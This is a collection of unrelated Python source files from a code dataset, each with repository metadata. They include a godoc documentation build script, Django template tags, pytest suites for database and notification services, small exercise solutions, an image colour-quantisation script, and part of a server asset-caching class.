\"\"\".format(\n id=header.lower().replace(' ', '-'),\n header=header,\n contents=contents,\n)\n\ndef update_file(output_path, formatter):\n with open(os.path.join(OUTPUT_DIR, output_path), 'r+') as output_file:\n contents = output_file.read()\n contents = replace_pkg_links(contents)\n\n ih = contents.index('')\n contents = '{}{}'.format(\n contents[:ih],\n '../' * output_path.count('/'),\n contents[ih:],\n )\n\n if formatter:\n contents = formatter(contents)\n\n output_file.seek(0)\n output_file.write(''.join(contents))\n\nrun('go get golang.org/x/tools/cmd/godoc@v0.0.0-20191213221258-04c2e8eff935')\n\ngopath = os.getenv('GOPATH')\ngodoc_process = subprocess.Popen(gopath + '/bin/godoc', cwd='../')\n\n# wait 3 seconds for the above process to be ready,\n# no easy API to ensure it actually is\nsleep(30)\n\nensure_clean_dir(OUTPUT_DIR)\nprint('-> Going to scrape the godoc server, this will take some time...')\nwget_error_code = run(\n 'wget -m -k -q -erobots=off -X src/ --no-host-directories --no-use-server-timestamps http://localhost:6060',\n cwd=OUTPUT_DIR,\n timeout=300, # 5 min\n ignore_errors=True,\n)\n\nprint('-> Done scraping. Killing process')\ngodoc_process.kill()\n\nif wget_error_code not in [0, 8]: # 0 is ok, 8 is server error we don't care about\n print('!!-> wget error code', wget_error_code)\n # sys.exit(wget_error_code)\n\nprint('-> Injecting additional documentation into scraped html files')\ngames = {}\nfor filename in os.listdir(GAMES_DOCS_DIR):\n with open(os.path.join(GAMES_DOCS_DIR, filename), 'r') as game_data_file:\n parsed_file = json.load(game_data_file)\n games[parsed_file['game_name']] = parsed_file\n\n# Inject/change up the index.html file a bit to be more Cadre game centric.\ndef root_index_update_contents(contents):\n # auto collapse all sections because the vast majority of the packages\n # are redundant to go users\n contents = contents.replace('class=\"toggleVisible\"', 'class=\"toggle\"')\n\n # and slice in some additional documentation data about the games\n i = contents.index('
')\n return contents[:i] + \"\"\"\n
Joueur.go Documentation
\n\nThis is the documentation for the Go Cadre client and its various game\npackages.\n\n{}\n{}\n\"\"\".format(\n template_collapsible_section(\n 'Games', \"\"\"\n
These are the games that are available to play via the Go Client. Their\n source code is stored in the directory: games/game_name/, where\n game_name is the name of the game.\n
\n \"\"\".format(\n game_name=game_name,\n pkg_link=package_link_to(game_name),\n description=games[game_name]['description']\n ) for game_name in sorted(games.keys())\n ]))\n ),\n template_collapsible_section(\n \"Coding Your AI\", \"\"\"\n
Interfaces
\n
With the exception of your AI, which is a struct, all of the game\n            components you will interact with are exposed through Go\n            interfaces. This means that all attributes must be accessed via\n            function calls, e.g.:\n
\nplayer_name := ai.Player().Name()\n
\n
\n \n
Unless otherwise noted in the documentation, assume all interfaces are\npopulated by an instance of a struct implementing that interface. However, some\nattributes, function calls, etc. will explicitly tell you if the returned value\ncan be nil (a nil pointer).\n
\n\n
Modifying non-AI files
\n
\nEach interface type inside of games/game_name/, except for your\n    ai.go, should ideally not be modified. \nThey are intended to be read-only constructs that hold the state of that\n    object at the point in time you are reading its properties.\n
\n
\nWith that being said, if you really wish to add functionality, such as\n    helper functions, ensure they do not directly modify game state information\n    or interfere with our existing functionality; otherwise there is a good chance your\n    client will crash during gameplay with a DELTA_MERGE_FAILURE.\n
\n
Implementation logic for the interfaces (except your AI) is all tucked away\n    in games/internal/game_name_impl. It is highly recommended not to\n    modify these files as they are largely written by our \n    Creer code generation tool and may need to be modified if the game\n    structure is tweaked.\n
\n\n
Game Logic
\n\n
If you are attempting to figure out how the logic is executed for a game,\n    that code is not here. \n    All Cadre game clients are dumb state-tracking\n    programs that facilitate I/O between a game server and your AI in whatever\n    programming language you choose.\n
\n
\nIf you wish to get the actual code for a game, check in the\n    Cerveau game server. Its directory structure is\n    similar to most clients (such as this one).\n
\n\"\"\".format(\n cadre_link='https://github.com/siggame/Cadre',\n cerveau_link='https://github.com/siggame/Cerveau',\n creer_link='https://github.com/siggame/Creer',\n )),\n) + contents[i:]\n\nupdate_file('index.html', root_index_update_contents)\n\n# for each game, add additional text explaining the game\nfor game_name, game_docs in games.items():\n def game_index_update_contents(contents):\n i = contents.index('
\n{description}\n\n
More Info
\n
\nThe full game rules for {game_name} can be found on GitHub.\n
''' % (condition, start + 5)\n\n return mark_safe(ele)\n return ''\n","repo_name":"if000else/PerfectCRM","sub_path":"kingadmin/templatetags/kingadmin_tags.py","file_name":"kingadmin_tags.py","file_ext":"py","file_size_in_byte":6402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"40687244296","text":"print(\"\\n**** CALCULADORA DE CALORIAS DIÁRIAS ****\")\r\nquantidade_alimento = int(input(\"\\nDigite a quantidade de alimentos ingeridos no seu dia: \"))\r\nsoma = 0\r\n\r\nfor x in range(1, quantidade_alimento+1):\r\n calorias_alimentos = float(input(\"Informe a quantidade de calorias do alimento {}: \".format(x)))\r\n soma = soma + calorias_alimentos\r\nprint(\"\\n O TOTAL DE CALORIAS INGERIDAS É DE: {} Kcal\".format(soma))\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"GustavoPetry/Solving-Python","sub_path":"004 - Calculadora de Calorias.py","file_name":"004 - Calculadora de Calorias.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"6475713929","text":"from os import path\nfrom pathlib import Path\nfrom unittest.mock import Mock\n\nimport pytest\nfrom alembic.config import Config\nfrom alembic.migration import MigrationContext\nfrom alembic.script import ScriptDirectory\nfrom sqlalchemy import select\n\nfrom covalent_dispatcher._db import models\nfrom covalent_dispatcher._db.datastore import DataStore\n\nfrom .fixtures import workflow_fixture\n\n\n@pytest.fixture\ndef db():\n \"\"\"Instantiate and return an in-memory database.\"\"\"\n\n return DataStore(\n db_URL=\"sqlite+pysqlite:///:memory:\",\n initialize_db=True,\n )\n\n\ndef test_db_path(db: DataStore, tmp_path: Path):\n db_dir_path = tmp_path / \"db_dir\"\n db_dir_path.mkdir()\n db_path = db_dir_path / \"my_db.sqlite\"\n\n db_url = f\"sqlite+pysqlite:///{str(db_path.resolve())}\"\n\n db = DataStore(db_URL=db_url, initialize_db=True)\n assert db.db_URL == db_url\n\n\ndef test_default_db_path(db: DataStore, tmp_path: Path, mocker):\n DB_PATH = \"/tmp/my_db.sqlite\"\n\n mocker.patch(\"sqlalchemy.create_engine\")\n mocker.patch(\"sqlalchemy.orm.sessionmaker\")\n mocker.patch(\"covalent_dispatcher._db.datastore.get_config\", return_value=DB_PATH)\n\n db_url = f\"sqlite+pysqlite:///{DB_PATH}\"\n\n assert DataStore().db_URL == db_url\n\n\ndef test_run_migrations(db: DataStore, mocker):\n config_mock = Mock()\n command_mock = mocker.patch(\"covalent_dispatcher._db.datastore.command\")\n\n def get_config_mock(logging_enabled):\n return config_mock\n\n mocker.patch.object(db, \"get_alembic_config\", get_config_mock)\n\n db.run_migrations()\n command_mock.upgrade.assert_called_once_with(config_mock, \"head\")\n\n\ndef test_current_head(db: DataStore, mocker):\n MOCK_REVISION = \"8a15\"\n script_mock = Mock()\n mocker.patch.object(ScriptDirectory, \"from_config\", lambda config: script_mock)\n script_mock.get_current_head.return_value = MOCK_REVISION\n assert db.current_head() == MOCK_REVISION\n\n\ndef test_current_revision(db: DataStore, mocker):\n MOCK_REVISION = \"8a15\"\n script_mock = Mock()\n migration_ctx_mock = Mock()\n mocker.patch(\"covalent_dispatcher._db.datastore.EnvironmentContext\")\n mocker.patch.object(db, \"engine\", Mock())\n mocker.patch.object(ScriptDirectory, \"from_config\", lambda config: script_mock)\n mocker.patch.object(\n MigrationContext, \"configure\", lambda config, environment_context=None: migration_ctx_mock\n )\n\n migration_ctx_mock.get_current_revision.return_value = MOCK_REVISION\n\n assert db.current_revision() == MOCK_REVISION\n\n\ndef test_get_alembic_config(db: DataStore, mocker):\n config_mock = mocker.patch(\"covalent_dispatcher._db.datastore.Config\")\n\n def alembic_config_init(self, provided_path):\n # ensure provided path matches project root / alembic.ini\n assert provided_path == Path(path.join(__file__, \"./../../../../alembic.ini\")).resolve()\n\n mocker.patch.object(Config, \"__init__\", alembic_config_init)\n assert db.get_alembic_config() == config_mock()\n\n\n@pytest.mark.usefixtures(\"workflow_fixture\")\ndef test_insertion(db: DataStore, workflow_fixture):\n electron_dependency = workflow_fixture[\"electron_dependency\"][0]\n with db.session() as session:\n session.add(electron_dependency)\n session.commit()\n with db.session() as session:\n statement = select(models.ElectronDependency)\n results = session.execute(statement).all()\n assert len(results) == 
1\n","repo_name":"AgnostiqHQ/covalent","sub_path":"tests/covalent_dispatcher_tests/_db/db_test.py","file_name":"db_test.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":584,"dataset":"github-code","pt":"66"}
+{"seq_id":"33619869162","text":"import pytest\n\nimport json\n\n\n@pytest.mark.pgsql(\n 'eats_notifications',\n queries=[\n \"\"\"\n INSERT INTO eats_notifications.projects (name, key, tanker_project,\n tanker_keyset, intent)\n VALUES ('project_name_test', 'project_key_test', 'tanker_project_test',\n 'tanker_keyset_test', 'intent_test')\n \"\"\",\n \"\"\"\n INSERT INTO eats_notifications.templates (name, key, project_id,\n transport_type, waiting_condition, ttl)\n VALUES ('template_name_test', 'template_key_test', 1, 0, 'sent', 0)\n \"\"\",\n \"\"\"\n INSERT INTO eats_notifications.notifications (token, status,\n project_id, template_id, user_id, application, user_device_id,\n notification_params, message_title, message_body, deeplink,\n api_response, request, message_id, client_type, sent_at,\n sent_transport_type, personal_phone_id)\n VALUES ('test_token', 'skipped', 1, 1, 'test_user_id',\n 'test_application', 'test_user_device_id', '{}',\n 'test_message_title', 'test_message_body', 'test_deeplink',\n 'test_api_response', 'test_request', 'test_message_id',\n 'client-notify', '2021-07-28T18:00:00+00:00', 'push',\n 'personal_phone_id_test')\n \"\"\",\n \"\"\"\n INSERT INTO eats_notifications.user_devices\n (user_id, auth_token, active, device_id, model, brand)\n VALUES ('test_user_id', 'x_taxi_session_value', TRUE,\n 'test_user_device_id', 'model_test', 'brand_test'),\n ('test_user_id_2', 'x_taxi_session_value_1', FALSE,\n 'test_user_device_id', 'model_test', 'brand_test')\n \"\"\",\n ],\n)\n@pytest.mark.parametrize(\n 'request_json', [pytest.param({'tokens': ['test_token']})],\n)\nasync def test_200(taxi_eats_notifications, taxi_config, request_json):\n # get history\n response = await taxi_eats_notifications.post(\n '/v1/notification/get-history', json=request_json,\n )\n assert response.status_code == 200\n assert len(response.json()['notifications']) == 1\n assert (\n response.json()['notifications'][0]['application']\n == 'test_application'\n )\n assert (\n response.json()['notifications'][0]['client_type'] == 'client-notify'\n )\n assert response.json()['notifications'][0]['deeplink'] == 'test_deeplink'\n assert (\n response.json()['notifications'][0]['message_body']\n == 'test_message_body'\n )\n assert (\n response.json()['notifications'][0]['message_id'] == 'test_message_id'\n )\n assert (\n response.json()['notifications'][0]['message_title']\n == 'test_message_title'\n )\n assert (\n response.json()['notifications'][0]['sent_at']\n == '2021-07-28T18:00:00+00:00'\n )\n assert response.json()['notifications'][0]['status'] == 'skipped'\n assert response.json()['notifications'][0]['token'] == 'test_token'\n assert response.json()['notifications'][0]['user_id'] == 'test_user_id'\n assert (\n response.json()['notifications'][0]['device']\n == 'brand_test model_test'\n )\n assert (\n response.json()['notifications'][0]['personal_phone_id']\n == 'personal_phone_id_test'\n )\n assert response.json()['notifications'][0]['transport_type'] == 'push'\n\n\n@pytest.mark.parametrize(\n 'body_tags, expected_result',\n [\n pytest.param(\n [\n {'key': 'city', 'value': 'moscow'},\n {'key': 'order_id', 'value': 'order_id-123'},\n ],\n {\n 'notification_token-1': {\n 'expected_tags': [\n {'key': 'group', 'value': 'group-2'},\n {'key': 'order_id', 'value': 'order_id-123'},\n {'key': 'city', 'value': 'moscow'},\n ],\n },\n 'notification_token-3': {\n 'expected_tags': [\n {'key': 'group', 'value': 'group-1'},\n {'key': 'order_id', 'value': 'order_id-123'},\n {'key': 'city', 'value': 'moscow'},\n ],\n 
},\n },\n marks=[\n pytest.mark.pgsql(\n 'eats_notifications',\n queries=[\n \"\"\"\n INSERT INTO eats_notifications.notifications_tags\n (key, value, notification_token, updated_at)\n VALUES ('order_id', 'order_id-123', 'notification_token-1', '2021-07-28T18:00:00+00:00'),\n ('group', 'group-2', 'notification_token-1', '2021-07-28T18:00:00+00:00'),\n ('order_id', 'order_id-321', 'notification_token-2', '2021-07-28T18:00:00+00:00'),\n ('order_id', 'order_id-123', 'notification_token-3', '2021-07-28T18:00:00+00:00'),\n ('city', 'moscow', 'notification_token-3', '2021-07-28T18:00:00+00:00'),\n ('city', 'moscow', 'notification_token-1', '2021-07-28T18:00:00+00:00'),\n ('city', 'moscow', 'notification_token-4', '2021-07-28T18:00:00+00:00'),\n ('group', 'group-1', 'notification_token-3', '2021-07-28T18:00:00+00:00');\n \"\"\",\n \"\"\"\n INSERT INTO eats_notifications.notifications \n (token, status, notification_params, message_title, message_body, sent_at)\n VALUES ('notification_token-1', 'sent', '{}', '', '', '2021-07-28T18:00:00+00:00'),\n ('notification_token-2', 'sent', '{}', '', '', '2021-07-28T18:00:00+00:00'),\n ('notification_token-3', 'sent', '{}', '', '', '2021-07-28T18:00:00+00:00'),\n ('notification_token-4', 'sent', '{}', '', '', '2021-07-28T18:00:00+00:00')\n \"\"\",\n ],\n ),\n ],\n id='Filtering',\n ),\n pytest.param(\n [\n {'key': 'city', 'value': 'moscow'},\n {'key': 'order_id', 'value': 'order_id-123'},\n ],\n {},\n id='No tokens found',\n ),\n ],\n)\nasync def test_find_history_by_tags(\n taxi_eats_notifications, pgsql, expected_result, body_tags,\n):\n body = {'tags': body_tags}\n\n expected_tokens = expected_result.keys()\n\n response = await taxi_eats_notifications.post(\n '/v1/notification/get-history-by-tags', json=body,\n )\n assert response.status_code == 200\n\n notifications = response.json()['notifications']\n\n tokens = [item['notification']['token'] for item in notifications]\n assert sorted(tokens) == sorted(expected_tokens)\n\n for item in notifications:\n token = item['notification']['token']\n expected_tags = expected_result[token]['expected_tags']\n assert sorted(item['tags'], key=lambda x: x['value']) == sorted(\n expected_tags, key=lambda x: x['value'],\n )\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_eats_notifications/test_notification_history.py","file_name":"test_notification_history.py","file_ext":"py","file_size_in_byte":7183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"43169901848","text":"# _*_ coding:utf-8 _*_\r\nimport requests\r\nfrom Scripts.ConfigFile import *\r\nfrom Scripts.GetCurrentTime import *\r\nfrom Scripts.GetReport import *\r\n\r\n\r\nclass QQLogin:\r\n def qq_login(self, openid):\r\n \"\"\"\r\n QQ登录\r\n :param openid:\r\n :return:\r\n \"\"\"\r\n post_data = {\"type\": \"qq\", # QQ: 'qq'; 微信: 'weixin'\r\n \"openid\": openid, # 第三方平台的唯一标识\r\n \"auth_token\": \"\" # 第三方平台的授权码\r\n }\r\n headers = {\"Cache - Control\": \"no - cache\",\r\n \"Content - Type\": \"text / html;charset = UTF - 8\",\r\n 'Accept': 'application/json',\r\n \"Date\": \"%s\" % GetCurrentTime().getHeaderTime(),\r\n \"Proxy - Connection\": \"Keep - alive\",\r\n \"Server\": \"nginx / 1.9.3(Ubuntu)\",\r\n \"Transfer - Encoding\": \"chunked\"}\r\n third_login_url = \"http://%s/user/thirdlogin\" % ConfigFile().host()\r\n request = requests.post(third_login_url, data=post_data, headers=headers)\r\n time = GetCurrentTime().getCurrentTime()\r\n status_code = request.status_code\r\n try:\r\n if status_code in (200, 422):\r\n json = request.json()\r\n info = json[\"info\"]\r\n return json\r\n else:\r\n info = request.reason\r\n finally:\r\n log_list = [u'QQ登录', u\"post\", third_login_url, str(post_data), time, status_code, info]\r\n GetReport().get_report() # 生成或打开日志文件\r\n GetReport().record_into_report(log_list) # 逐条写入日志\r\n\r\n\r\nif __name__ == \"__main__\":\r\n r = QQLogin()\r\n print(r.qq_login(\"openid\"))\r\n","repo_name":"AbigaleLiu/WuKongDianJing","sub_path":"Scripts/APIScripts/Other/QQLogin.py","file_name":"QQLogin.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"402293509","text":"def maxRotateFunction(nums) -> int:\n # from given pattern\n # derived the formula for F(k) as follows\n # F(k) = F(k-1) + SUM + N * arr[N - k]\n\n n = len(nums)\n S = sum(nums)\n\n prefixSum = 0\n for i, val in enumerate(nums):\n prefixSum += (i * val)\n\n maxVal = prefixSum\n for i in range(1, n):\n prefixSum = prefixSum + S - (n * nums[-i])\n maxVal = max(maxVal, prefixSum)\n\n return maxVal\n\n\nn1 = [4, 3, 2, 6]\nn2 = [100]\n\nprint(maxRotateFunction(n1))\n","repo_name":"SahilDeb/6Companies30days","sub_path":"Microsoft_Company_1/RotateFunction.py","file_name":"RotateFunction.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"22923116043","text":"from math import sqrt\n\nclass Solution:\n # @param A : integer\n # @return a list of integers\n def sieve(self, A):\n if A < 2:\n return []\n check_primes = [1]* A\n check_primes.append(1)\n \n primes = []\n primes.append(2)\n primes.append(3)\n primes.append(5)\n primes.append(7)\n primes.append(11)\n \n sqa = int(sqrt(A))\n for i in xrange(3, sqa+1, 2):\n if check_primes[i] ==1:\n for j in xrange(i*i, A+1, i): # start at square of current prime as an optimization\n check_primes[j] = 0\n primes.append(i)\n next = sqa if sqa % 2 == 1 else sqa+1\n for i in xrange(next, A+1, 2):\n if check_primes[i] == 1:\n primes.append(i)\n return primes\n \n def primesum(self, A):\n primes = self.sieve(A)\n set_primes = set(primes)\n for i in primes:\n if A-i in set_primes:\n return (i, A-i)\n return []\n","repo_name":"rsubbu55/coding-prep","sub_path":"i-b/math/prime-sum.py","file_name":"prime-sum.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"43316076024","text":"from tkinter import *\nimport re\n\n\nroot = Tk()\nroot.minsize(800, 600)\ntext = Text(root, width=800//10, height=600//20)\n\n#re.sub('[ES]', 'a', s)\ndef writeOut():\n global text\n words = text.get(\"1.0\",\"end-1c\")\n new_words = []\n hyphenated_words = re.findall(r\"\\w+(?:- \\S+\\w+)+\", words)\n for x in hyphenated_words:\n nx = x.replace(\"- \", \"\")\n words = words.replace(x, nx)\n print(words)\n\n## print(type(hyphenated_words))\n## print(re.search(r\"\\w+(?:- \\S+\\w+)+\", words).group(0))\n #print(re.sub(r\"\\w+(?:- \\S+\\w+)+\", \"\\b\", words))\n f = open(\"output.txt\", \"w\")\n f.write(text.get(\"1.0\",\"end-1c\"))\n f.close()\n\n\n\n\nB = Button(root, text=\"Format And Writeout\", command=writeOut)\nB.place(x = 800//2, y = 600//3)\ntext.pack()\nB.pack()\nroot.mainloop()\n","repo_name":"vasunep0306/antihiphen","sub_path":"perfect_formatter.py","file_name":"perfect_formatter.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"12407933048","text":"from __future__ import annotations\n\nfrom psycopg2.extras import DictCursor\n\nfrom wazo_agid import agid\nfrom xivo_dao.resources.conference import dao as conference_dao\n\n\ndef incoming_conference_set_features(\n agi: agid.FastAGI, cursor: DictCursor, args: list[str]\n) -> None:\n conference_id = int(agi.get_variable('XIVO_DSTID'))\n\n try:\n conference = conference_dao.get(conference_id)\n except ValueError as e:\n agi.dp_break(str(e))\n\n menu = 'xivo-default-user-menu'\n user_profile = f'xivo-user-profile-{conference.id}'\n if conference.pin:\n for _ in range(4):\n agi.answer()\n pin = agi.get_data('conf-getpin', 10000, 80)\n if pin == conference.pin:\n break\n elif pin == conference.admin_pin:\n menu = 'xivo-default-admin-menu'\n user_profile = f'xivo-admin-profile-{conference.id}'\n break\n else:\n agi.stream_file('conf-invalidpin')\n else:\n agi.dp_break(\n 'Unable to join the conference room, wrong pin'\n f'(conference_id: {conference.id}, name: {conference.name})'\n )\n\n agi.set_variable('WAZO_CONFBRIDGE_ID', conference.id)\n agi.set_variable('WAZO_CONFBRIDGE_TENANT_UUID', conference.tenant_uuid)\n agi.set_variable(\n 'WAZO_CONFBRIDGE_BRIDGE_PROFILE', f'xivo-bridge-profile-{conference.id}'\n )\n agi.set_variable('WAZO_CONFBRIDGE_USER_PROFILE', user_profile)\n agi.set_variable('WAZO_CONFBRIDGE_MENU', menu)\n agi.set_variable(\n 'WAZO_CONFBRIDGE_PREPROCESS_SUBROUTINE', conference.preprocess_subroutine or ''\n )\n agi.appexec('CELGenUserEvent', f'WAZO_CONFERENCE, NAME: {conference.name or \"\"}')\n\n\nagid.register(incoming_conference_set_features)\n","repo_name":"wazo-platform/wazo-agid","sub_path":"wazo_agid/modules/incoming_conference_set_features.py","file_name":"incoming_conference_set_features.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"38373921898","text":"import numpy as np\nimport cv2 as cv\nimport operator\nfrom heapq import nlargest\n\nclass kdTree():\n\tdef __init__(self, rootid):\n\t\tself.left = None\n\t\tself.right = None\n\t\tself.rootid = rootid\n\ndef get_leaf_nodes(node):\n\tleafs = []\n\tif node is not None:\n\t\tif node.left is None and node.right is None:\n\t\t\tleafs.append(node.rootid)\n\t\tleafs += get_leaf_nodes(node.left) + get_leaf_nodes(node.right)\n\treturn leafs\n\ndef readImage(imgName):\n\timg = cv.imread(imgName)\n\tfor i in range(len(img)):\n\t\tfor j in range(len(img[0])):\n\t\t\timg[i][j] = img[i][j]/8\n\t\t\timg[i][j] = img[i][j]*8\n\treturn img\n\ndef calHistogram(img):\n\thistogram = {}\n\tfor row in img:\n\t\tfor pixel in row:\n\t\t\tif (pixel[0], pixel[1], pixel[2]) in histogram:\n\t\t\t\thistogram[(pixel[0], pixel[1], pixel[2])] += 1\n\t\t\telse:\n\t\t\t\thistogram[(pixel[0], pixel[1], pixel[2])] = 0\n\treturn histogram\n\ndef showImage(name):\n\tcv.imshow('Quantised Image', name)\n\tk = cv.waitKey(0)\n\tif k == 27:\n\t\tcv.destroyAllWindows()\n\ndef growTree(points, k):\n\n\tif k == 1:\n\t\treturn None\n\n\tvar = (np.var(points, axis=0)).tolist()\n\tind = var.index(max(var))\n\tmed = (np.median(points, axis=0))[ind]\n\n\troot = kdTree(med)\n\tleft = [x for x in points if x[ind] < med]\n\tright = [x for x in points if x[ind] >= med]\n\n\tif k/2 != 1:\n\t\troot.left = growTree(left, k/2)\n\t\troot.right = growTree(right, k-k/2)\n\telse:\n\t\tavg = [0,0,0]\n\t\tfor i in range(0, len(points)):\n\t\t\t\tavg += points[i]\n\t\tavg = avg/float(len(points))\n\n\t\troot.rootid = avg\n\n\treturn root\n\ndef findKColors(image, K):\n\tlst = []\n\tfor i in range(0, len(image)):\n\t\tfor j in range(0, len(image[0])):\n\t\t\tlst.append(image[i][j])\n\ttree = growTree( lst , K)\n\n\tkColors = get_leaf_nodes(tree)\n\n\treturn kColors\n\ndef findDist(pixel, color):\n\td = 0\n\tfor i in range(len(pixel)):\n\t\td += (int(pixel[i]) - int(color[i]))**2\n\treturn d\n\ndef quantise(k_colors, histogram):\n\tlookUpt = {}\n\ti=0\n\tfor h in histogram.keys():\n\t\tminD = findDist(h, k_colors[0])\n\t\tval = k_colors[0]\n\t\tfor color in k_colors:\n\t\t\td = findDist(h, color)\n\t\t\tif d < minD:\n\t\t\t\tminD = d\n\t\t\t\tval = color\n\t\tlookUpt[h] = val\n\t\ti += 1\n\treturn lookUpt\n\ndef createFinalImage(img, lookUpt):\n\tfinalImg = img\n\tfor i in range(len(finalImg)):\n\t\tfor j in range(len(finalImg[0])):\n\t\t\tfinalImg[i][j] = lookUpt[(finalImg[i][j][0], finalImg[i][j][1], finalImg[i][j][2])]\n\treturn finalImg\n\nimage_path = input(\"Path to image: \")\nk = int(input(\"Quantisation level: \"))\n\nimage = readImage(image_path)\nhistogram = calHistogram(image)\nk_colors = findKColors(image, k)\nlookUpt = quantise(k_colors, histogram)\nfinalImg = createFinalImage(image, lookUpt)\nshowImage(finalImg)\n\n# # r = []\n# # g = []\n# # b = []\n# # for i in range(0, len(finalImg)):\n# # \tfor j in range(0, len(finalImg[0])):\n# # \t\tr.append(finalImg[0])\n# # \t\tg.append(finalImg[1])\n# # \t\tb.append(finalImg[2])\n\t\t\n# Hdat = []\n# Ldat = []\n# Sdat = [] \n# for row in finalImg:\n# \tfor pixel in row:\n# \t\th,l,s = colorsys.rgb_to_hls(pixel[0]/255., pixel[1]/255., pixel[2]/255.)\n# \t\tHdat.append(int(h*255.))\n# \t\tLdat.append(int(l*255.))\n# \t\tSdat.append(int(s*255.))\n\n# r.putdata(Hdat)\n# g.putdata(Ldat)\n# b.putdata(Sdat)\n# newimg = Image.merge('RGB',(r,g,b))\n# 
newimg.save('lenaHSV.png')","repo_name":"harsimrats/COL783","sub_path":"1/1b.py","file_name":"1b.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"42834493394","text":"import io\nimport re\nimport json\nimport shutil\nimport tempfile\nimport os.path\n\nfrom django.core.validators import validate_email\nfrom rest_framework.exceptions import NotFound\n\nimport analitico\nimport analitico.plugin\nimport analitico.utilities\n\nfrom analitico.factory import Factory\n\nimport api.models\nimport api.plugin\n\n# import plugins for Supermercato24 (if available)\nimport s24.plugin # NOQA\n\n# pylint: disable=no-member\n\n\n##\n## ServerFactory\n##\n\n# analitico://item_type/item_id/asset_class/asset_id, eg: analitico://dataset/ds_xxx/assets/data.csv\nANALITICO_ASSET_RE = (\n r\"analitico:\\/\\/(?P[\\a-z]+)s\\/(?P[\\w]+)\\/(?Pdata|assets)\\/(?P[-\\w\\.]+)\"\n)\n\n\nclass ServerFactory(Factory):\n \"\"\" A factory used to run notebooks and plugins in the context of a server with direct access to items via SQL \"\"\"\n\n def __init__(self, job=None, mkdtemp=True, **kwargs):\n super().__init__(**kwargs)\n if job:\n self.set_attribute(\"job\", job)\n # special temp directory which is deleted automatically?\n if mkdtemp:\n self._temp_directory = tempfile.mkdtemp(prefix=\"analitico_temp_\")\n\n ##\n ## Temp and cache directories\n ##\n\n # Temporary directory which is deleted when factory is disposed\n _temp_directory = None\n\n def get_temporary_directory(self):\n \"\"\" Temporary directory is deleted when ServerFactory is disposed \"\"\"\n return self._temp_directory if self._temp_directory else super().get_temporary_directory()\n\n def get_artifacts_directory(self):\n \"\"\" Artifacts directory is a subdirectory of temporary and is deleted automatically \"\"\"\n artifacts_dir = os.path.join(self.get_temporary_directory(), \"artifacts\")\n if not os.path.isdir(artifacts_dir):\n os.mkdir(artifacts_dir)\n return artifacts_dir\n\n ##\n ## URL retrieval, authorization and caching\n ##\n\n def get_cache_asset(self, item, asset_class, asset_id):\n \"\"\" \n Returns filename of cached asset after downloading it if necessary. \n File should be used as read only and copied if it needs to be modified.\n \"\"\"\n asset = item._get_asset_from_id(asset_class, asset_id, raise404=True)\n assert asset\n # name of the file in cache is determined by its hash so all files are unique and\n # we do not need to check versions, eg. 
if we have it with the correct name it's\n # the correct version and we can save a rountrip to check with the server\n storage_file = self.get_cache_filename(asset[\"hash\"])\n\n # if not in cache already download it from storage\n if not os.path.isfile(storage_file):\n storage = item.storage\n assert storage\n _, storage_stream = storage.download_object_via_stream(asset[\"path\"])\n _, storage_file = self.get_cached_stream(storage_stream, asset[\"hash\"])\n return storage_file\n\n def get_url_stream(self, url, binary=False):\n \"\"\" Job runner retrieves assets directly from cloud storage while using super for regular URLs \"\"\"\n # temporarily while all internal urls are updated prepend analitico://\n if url.startswith(\"workspaces/ws_\"):\n url = \"analitico://\" + url\n\n # job runner reads assets straight from cloud storage\n match = re.search(ANALITICO_ASSET_RE, url)\n if match:\n # find asset indicated in the url\n item_id = match.group(\"item_id\")\n asset_class = match.group(\"asset_class\")\n asset_id = match.group(\"asset_id\")\n\n # TODO should check that current requestor has access rights to this item\n item = self.get_item(item_id)\n\n # replace shorthand /data/csv with /data/data.csv\n wants_json = False\n if asset_class == \"data\":\n if asset_id == \"csv\":\n asset_id = \"data.csv\"\n if asset_id == \"info\":\n asset_id = \"data.csv\"\n wants_json = True\n\n asset = item._get_asset_from_id(asset_class, asset_id, raise404=True)\n if wants_json:\n # format the same way as if it was returned by the server\n asset_json = json.dumps({\"data\": asset})\n return io.StringIO(asset_json)\n cache_filename = self.get_cache_asset(item, asset_class, asset_id)\n return open(cache_filename, \"rb\")\n # base class handles regular URLs\n return super().get_url_stream(url)\n\n def upload_artifacts(self, item):\n \"\"\" Uploads all files in the artifacts directory to the given item's data assets \"\"\"\n directory = self.get_artifacts_directory()\n for path in os.listdir(directory):\n fullpath = os.path.join(directory, path)\n # process only files (skip directories and .info files)\n if os.path.isfile(fullpath) and not path.endswith(\".info\"):\n path_size = os.path.getsize(fullpath)\n with open(fullpath, \"rb\") as f:\n # if asset has a .info companion read as extra info on the asset\n extras_path = fullpath + \".info\"\n extras = analitico.utilities.read_json(extras_path) if os.path.isfile(extras_path) else {}\n if fullpath.endswith(\".csv\") and \"rows\" not in extras:\n extras[\"rows\"] = analitico.utilities.get_csv_row_count(fullpath)\n # upload asset and extras, item will take care of saving to database\n item.upload_asset_stream(f, \"data\", path, path_size, None, path, extras)\n\n def restore_artifacts(self, item, artifacts_path=None, symlink=True):\n \"\"\" Restores artifacts stored by item to the artifacts directory \"\"\"\n assets = item.get_attribute(\"data\")\n if 